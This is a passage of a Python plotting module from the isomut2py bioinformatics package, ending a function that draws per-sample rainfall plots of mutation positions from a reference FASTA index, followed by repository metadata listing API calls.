The horizontal axis is the genomic position of each mutation and the vertical axis is the genomic\n difference measured from the previous mutation.\n\n :param mutations_dataframe: the pandas.DataFrame containing all mutations (pandas.DataFrame)\n :param chromosomes: a list of chromosomes to be plotted (default: None) (list of str)\n :param chrom_length: a list of chromosome lengths (default: None) (list of int)\n :param ref_fasta: the path to the reference fasta file (default: None) (str)\n :param sample_names: the list of sample names to be plotted (default: None) (list of str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, which can be included in HTML files. (default: False) (bool)\n :param muttypes: the list of mutation types to be plotted (default: [\"SNV\", \"INS\", \"DEL\"]) (any elements of the default list)\n :param unique_only: If True, only unique mutations are plotted for each sample. (default: True) (boolean)\n :param plot_range: the genomic range to be plotted (default: None, the whole genome is plotted) (str, example: \"chr9:123134-143441414\")\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n def get_default_chroms_with_len(ref_genome, chrom_list):\n \"\"\"\n Gets the lengths of the chromosomes defined in chrom_list or, if chrom_list is empty, gets the default list of chromosomes from the specified\n reference genome fasta file (set in ref_genome) together with their lengths.\n\n :param ref_genome: The path to the reference genome fasta file.\n :param chrom_list: A predefined list of chromosomes to be included.\n :returns: (chroms, lens):\n - chroms: a list of detected chromosomes (list of str)\n - lens: a list of their lengths (list of int)\n\n \"\"\"\n newchroms, newlens = [], []\n with open(ref_genome + '.fai') as f_h:\n for line in f_h:\n chrom, leng = line.split('\\t')[0], line.split('\\t')[1]\n if chrom in chrom_list or len(chrom_list) == 0:\n newchroms.append(chrom)\n newlens.append(int(leng))\n if len(chrom_list) > 0:\n return chrom_list, [newlens[newchroms.index(c)] for c in chrom_list]\n else:\n return sorted(newchroms), [newlens[newchroms.index(c)] for c in sorted(newchroms)]\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n if chromosomes is None or chrom_length is None:\n if ref_fasta is None or not __os.path.isfile(ref_fasta):\n raise ValueError('Error: supply either \"chromosomes\" AND \"chrom_length\" or \"ref_fasta\" arguments.')\n else:\n if not __os.path.isfile(ref_fasta + '.fai'):\n error_msg = 'Error: No faidx file found for reference genome file \"' + ref_fasta + '\", cannot proceed.'\n error_msg += '\\n'\n error_msg += 'Use the samtools command: samtools faidx [ref.fasta]'\n raise ValueError(error_msg)\n else:\n if chromosomes is None:\n chromosomes = sorted(list(mutations_dataframe['chr'].unique()))\n chromosomes, chrom_length = get_default_chroms_with_len(ref_fasta, chromosomes)\n\n spectrum_colors = ['#03bcee', '#010101', '#e32926', '#999999', '#a1ce63', '#ebc6c4', '#79159e', '#ffcc00']\n mutation_types = ['C > A', 'G > T', 'C > G', 'G > C', 'C > T', 'G > A', 'T > A', 'A > T', 'T > C', 'A > G', 'T > G',\n 'A > C']\n\n if plot_range is not None:\n range_chr = plot_range.split(':')[0]\n if ':' in plot_range:\n range_posmin = int(plot_range.split(':')[1].split('-')[0])\n range_posmax = int(plot_range.split(':')[1].split('-')[1])\n else:\n range_posmin = 0\n range_posmax = 
chrom_length[chromosomes.index(range_chr)]\n if range_posmin == range_posmax:\n raise ValueError('Error: unreadable range format. Make sure to set the range either by chromosome '\n '(e.g. \"chr9\") or by specific region (e.g. \"chr9:164574-345346\").')\n\n if unique_only:\n mutations_dataframe = mutations_dataframe[~mutations_dataframe['sample_name'].str.contains(',')]\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n figs = []\n\n for sample in sample_names:\n mutation_types_dict = __get_rainfall_data_for_sample(\n mutations_dataframe[mutations_dataframe['sample_name'].str.contains(sample)],\n chromosomes, chrom_length)\n\n total_num_of_muts = 0\n if 'SNV' in muttypes:\n total_num_of_muts += sum([len(mutation_types_dict[k]) for k in range(6)])\n if 'INS' in muttypes:\n total_num_of_muts += len(mutation_types_dict[6])\n if 'DEL' in muttypes:\n total_num_of_muts += len(mutation_types_dict[7])\n\n if total_num_of_muts < 2:\n print('There are not enough mutations in sample ' + sample + ' for a rainfall plot to be created.')\n continue\n\n f, ax = __plt.subplots()\n f.set_size_inches(20, 10)\n\n max_value = 0\n\n plots = []\n legend_titles = []\n\n zeropoint = 0\n if plot_range is not None:\n zeropoint = sum(chrom_length[:chromosomes.index(range_chr)])\n\n if 'SNV' in muttypes:\n for i in range(6):\n plots.append(\n __plt.scatter(__np.array([u[0] for u in mutation_types_dict[i]]) - zeropoint,\n [u[1] for u in mutation_types_dict[i]],\n c=spectrum_colors[i], edgecolor=spectrum_colors[i], s=50))\n legend_titles.append(mutation_types[i * 2])\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[i]])])\n\n if 'INS' in muttypes:\n plots.append(__plt.scatter(__np.array([u[0] for u in mutation_types_dict[6]]) - zeropoint,\n [u[1] for u in mutation_types_dict[6]],\n c=spectrum_colors[6], edgecolor=spectrum_colors[6], s=50))\n legend_titles.append('INS')\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[6]])])\n if 'DEL' in muttypes:\n plots.append(__plt.scatter(__np.array([u[0] for u in mutation_types_dict[7]]) - zeropoint,\n [u[1] for u in mutation_types_dict[7]],\n c=spectrum_colors[7], edgecolor=spectrum_colors[7], s=50))\n legend_titles.append('DEL')\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[7]])])\n\n ax.set_yscale('log')\n ax.yaxis.grid(True, c='lightgrey', lw=1.5, linestyle='dotted')\n if plot_range is not None:\n ax.set_xlim(range_posmin, range_posmax)\n else:\n ax.set_xlim(0, sum(chrom_length))\n ax.set_ylim(1, max_value * 1.1)\n ax.legend(tuple(plots),\n tuple(legend_titles),\n loc='center left', scatterpoints=1, bbox_to_anchor=(1, 0.5))\n\n if plot_range is None:\n for i in range(len(chrom_length)):\n __plt.plot((sum(chrom_length[:i]), sum(chrom_length[:i])), (1, 10e9), 'lightgray')\n ax.text((sum(chrom_length[:i]) + float(chrom_length[i]) / 2) / sum(chrom_length), -0.1,\n chromosomes[i],\n verticalalignment='bottom', horizontalalignment='center',\n transform=ax.transAxes,\n color='gray', fontsize=12, rotation='vertical')\n else:\n ax.text(0.5, -0.1,\n range_chr,\n verticalalignment='bottom', horizontalalignment='center',\n transform=ax.transAxes,\n color='gray', fontsize=12)\n\n ax.set_ylabel('genomic distance of each mutation from the previous one\\n', size=15)\n ax.set_xlabel('\\n\\n\\ngenomic position of mutation', size=15)\n ax.yaxis.set_tick_params(labelsize=15)\n 
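# Enlarge tick labels on both axes; the padded x label leaves room for the chromosome names drawn below the axis.\n 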
ax.xaxis.set_tick_params(labelsize=15)\n ax.set_title(sample + '\\n', size=15)\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n figs.append(f)\n __plt.show()\n __plt.close(f)\n\n return figs\n", "repo_name": "pipekorsi/isomut2py", "sub_path": "isomut2py/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 84681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 239, 
"usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 247, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 418, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 487, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 487, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 527, "usage_type": "call"}, {"api_name": "isomut2py.io.get_coverage_distribution", "line_number": 532, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 532, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path", "line_number": 537, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_cov_distribution_parameters_from_file", "line_number": 539, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 539, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 544, "usage_type": "call"}, {"api_name": "scipy.stats.norm.pdf", "line_number": 547, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 547, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 551, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 551, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.gcf", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 608, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 630, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 643, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 657, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 661, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 662, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 662, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 663, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 663, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 665, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 735, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 735, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 755, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 765, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 800, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 810, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 819, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 820, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 825, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 852, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 852, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 853, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 853, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 856, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 857, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 857, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 858, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 858, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 860, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 890, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 895, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_mutations", "line_number": 907, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 907, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 940, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 940, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 952, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 996, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 997, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 997, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 998, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 998, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1000, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1004, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1004, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1005, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1005, "usage_type": "name"}, {"api_name": "pandas.core", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_mutations", "line_number": 1044, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 1044, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 1054, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1061, "usage_type": "call"}, {"api_name": "seaborn.clustermap", "line_number": 1065, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1068, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1070, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1070, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1072, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1075, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1075, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1095, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1143, "usage_type": 
"name"}, {"api_name": "numpy.linspace", "line_number": 1149, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1157, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1174, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1181, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1199, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1235, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1239, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1243, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 1247, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1261, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1293, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1300, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1324, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1328, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1332, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 1332, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 1333, "usage_type": "call"}, {"api_name": "seaborn.axes_style", "line_number": 1338, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 1340, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 1342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 1345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1346, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 1349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", 
"line_number": 1350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1351, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 1357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1357, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1360, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1378, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1427, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1427, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 1431, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 1432, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1432, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 1436, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1444, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1461, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1463, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1466, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1468, "usage_type": "name"}, {"api_name": "seaborn.set_style", "line_number": 1471, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 1491, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1510, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 1514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1537, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1537, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1539, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1539, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 1566, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 1628, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 1633, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1633, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1636, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1636, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot.subplots", "line_number": 1688, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1688, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1703, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1703, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1703, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1707, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1710, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1710, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1710, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1714, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1716, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1716, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1716, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1720, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1735, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1735, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 1736, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1754, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1756, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1756, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1763, "usage_type": "name"}]}